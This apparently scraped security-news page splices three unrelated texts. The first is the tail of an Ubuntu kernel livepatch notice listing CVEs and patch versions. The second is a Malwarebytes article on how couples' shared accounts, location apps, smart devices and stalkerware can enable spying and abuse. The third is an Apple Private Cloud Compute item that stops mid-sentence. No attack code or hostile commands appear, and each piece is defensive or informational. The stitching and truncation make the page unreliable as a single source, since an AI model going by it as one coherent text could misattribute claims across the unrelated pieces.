been just added in this transactions, skip end interval elements that  
are not yet active. (CVE-2024-26581)

In the Linux kernel, the following vulnerability has been  
resolved: net: qualcomm: rmnet: fix global oob in rmnet_policy The  
variable rmnet_link_ops assign a bigger maxtype which leads to a global  
out-of- bounds read when parsing the netlink attributes. (CVE-2024-26597)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 104.1  
    azure - 104.1  
    gcp - 104.1  
    generic - 104.1  
    gke - 104.1  
    gkeop - 104.1  
    ibm - 104.1  
    lowlatency - 104.1  
    oracle - 104.1

Ubuntu 18.04 LTS  
    generic - 104.1  
    lowlatency - 104.1

Ubuntu 22.04 LTS  
    aws - 104.1  
    azure - 104.1  
    gcp - 104.1  
    generic - 104.1  
    gke - 104.1  
    ibm - 104.1  
    lowlatency - 104.1  
    oracle - 104.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-6270  
-   CVE-2023-51781  
-   CVE-2024-26581  
-   CVE-2024-26597

Kernel Live Patch Security Notice LSN-0104-1

Digital sharing is the norm in romantic relationships. But some access could leave partners vulnerable to inconvenience, spying, and abuse.

“When things go wrong” is a troubling prospect for most couples to face, but the internet—and the way that romantic partners engage both with and across it—could require that this worst-case scenario become more of a best practice.

In new research that Malwarebytes will release this month, romantic partners revealed that the degree to which they share passwords, locations, and devices with one another can invite mild annoyances—like having an ex mooch off a shared Netflix account—serious invasions of privacy—like being spied on through a smart doorbell—and even stalking and abuse.

Importantly, this isn’t just about jilted exes. This is also about people in active, committed relationships who have been pressured or forced into digital sharing beyond their limit.

The proof is in the data.

When Malwarebytes surveyed 500 people in committed relationships, 30% said they regretted sharing location tracking with their partner, 27% worried about their partners tracking them through location-based apps and services, and 23% worried that their current partner had accessed their accounts without their permission.

Plenty of healthy, happy relationships share digital access through trust and consent. For those couples, mapping out how to digitally separate and insulate their accounts from one another “when things go wrong” could seem misguided.

But for the many spouses, girlfriends, boyfriends, and partners who do not fully trust their significant other—or who are still figuring out how much to trust someone new—this exercise should serve as an act of security.

Here’s what people can think about when working through just how much of their digital lives to share.

****Inconvenient, annoying, and just plain bothersome****

A great deal of digital sharing within couples occurs on streaming platforms. One partner has Netflix, the other has Hulu, the two share Disney+, and years down the line, the couple can’t quite tell who is in charge of Apple Music and who is supposed to cancel the one-week free trial to Peacock.

This logistical nightmare, already difficult for people who are not in a committed relationship, is further complicated after a breakup (or during the relationship if one partner is particularly sensitive about their weekly algorithmic recommendations from Spotify).

If an ex maintains access to your streaming accounts even after a breakup, there’s little chance for abuse, but the situation can be aggravating. Maybe you don’t want your ex to know that you’re watching corny rom-coms, or that you’re absolutely going through it on your seventh replay of Spotify’s “Angry Breakup Mix.” These are valid annoyances that will require a password reset to boot your ex out of the shared account.

But there’s one type of shared account that should raise more caution than those listed above: A shared online shopping account, like Amazon.

With access to a shared online shopping account, a spiteful ex could purchase goods using your saved credit card. They could also keep updates on your location should you ever move and change addresses in the app. This isn’t the same threat as an ex having your real-time location, but for some individuals—particularly survivors of domestic abuse who have escaped their partner—any leak of a new address presents a major risk.

****Non-consensual tracking, monitoring, and spying****

When couples move into the same home, it can make sense to start sharing a variety of location-based apps.

Looking for a vacation rental online for your next getaway? You’re (hopefully) lodging together. Ordering delivery because nobody wants to make dinner? That order is being sent to the same shared address. Even some credit cards offer specific bonuses on services like Lyft, incentivizing some couples to rely more heavily on one account to score extra credits.

While sharing access between these types of accounts can increase efficiency, it’s important to know—and this may sound obvious—that many of these same shared location-based apps can reveal locations to a romantic partner, even after a breakup.

Your vacation could be revealed to an ex who is abusing their previously shared login privileges into services like Airbnb or Vrbo, or by someone peering into the trip history of a shared Uber account that discloses that a car was recently taken to the airport. Food delivery apps, similarly, can reveal new addresses after a move—a particular risk for survivors of domestic abuse who are trying to escape their physical situation.

In fact, any account that tracks and provides access to location—including Google’s own “Timeline” feature and fitness tracking devices made by Strava—could, in the wrong hands, become a security risk for stalking and abuse.

The vulnerabilities extend farther.

With the popularity of Internet of Things devices like smart doorbells and baby monitors, some partners may want to consider how safe they are from spying in their own homes. Plenty of user posts on a variety of community forums claim that exes and former spouses weaponized video-equipped doorbells and baby monitors to spy on a partner.

These scenarios are frightening, but they are part of a larger question about whether you should share your location with your partner. With the proper care and discussion, your location-sharing will be consensual, respected, and convenient for all.

****Stalking and abuse****

When discussing the risks around digital sharing between couples, it’s important to clarify that trustworthy partners do not become abusive simply because of their access to technology. A shared food delivery app doesn’t guarantee that a partner will be spied on. A baby monitor with a live video stream is sometimes just that—a baby monitor.

But many of the stories shared here expose the dangers that lie within arm’s reach for abusive partners. The technology alone cannot be blamed for the abuse. Instead, the technology must be scrutinized simply because of its ubiquitous use in today’s world.

The most serious concerns regarding digital access are the potential for stalking and abuse.

For partners that share devices and device passcodes, the notorious threat of stalkerware makes it easy for an abusive partner to pry into a person’s photos, videos, phone calls, text messages, locations, and more. Stalkerware can be installed on a person’s device in a matter of minutes—a low barrier of entry for couples that live with one another and who share each other’s device passcodes.

For partners who share a vehicle, a recent problem has emerged. In December, The New York Times reported on the story of a woman who—despite obtaining a restraining order against her ex-husband—could not turn off her shared vehicle’s location tracking. Because the car was in her husband’s name, he was able to reportedly continue tracking and harassing her.

Even shared smart devices have become a threat. According to reporting from The New York Times in 2018, survivors of domestic abuse began calling support lines with a bevvy of new concerns within their homes:

> “One woman had turned on her air-conditioner, but said it then switched off without her touching it. Another said the code numbers of the digital lock at her front door changed every day and she could not figure out why. Still another told an abuse help line that she kept hearing the doorbell ring, but no one was there.”

The survivors’ stories all pointed to the abuse of shared smart devices.

Whereas the solutions to many of the inconveniences and annoyances that can come with shared digital access are simple—a reset password, a removal of a shared account—the “solutions” for technology-enabled abuse are far more complex. These are problems that cannot be solely addressed with advice and good cybersecurity hygiene.

If you are personally experiencing this type of harassment, you can contact the National Network to End Domestic Violence on their hotline at 1-800-799-SAFE.

****Making sure things go right****

Sharing your life with your partner should be a function of trust, and for many couples, it is. But, in the same way that it is impossible for a cybersecurity company to ignore even one ransomware attack, it’s also improper for this cybersecurity and privacy company to ignore the reality facing many couples today.

There are new rules and standards for digital access within relationships. With the right information and the right guidance, hopefully more people will feel empowered to make the best decisions for themselves.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 When things go wrong: A digital sharing warning for couples 

Apple has announced the launch of a "groundbreaking cloud intelligence system" called Private Cloud Compute (PCC) that's designed for processing artificial intelligence (AI) tasks in a privacy-preserving manner in the cloud.
The tech giant described PCC as the "most advanced security architecture ever deployed for cloud AI compute at scale."
PCC coincides with the arrival of new generative AI (

Tag

#apple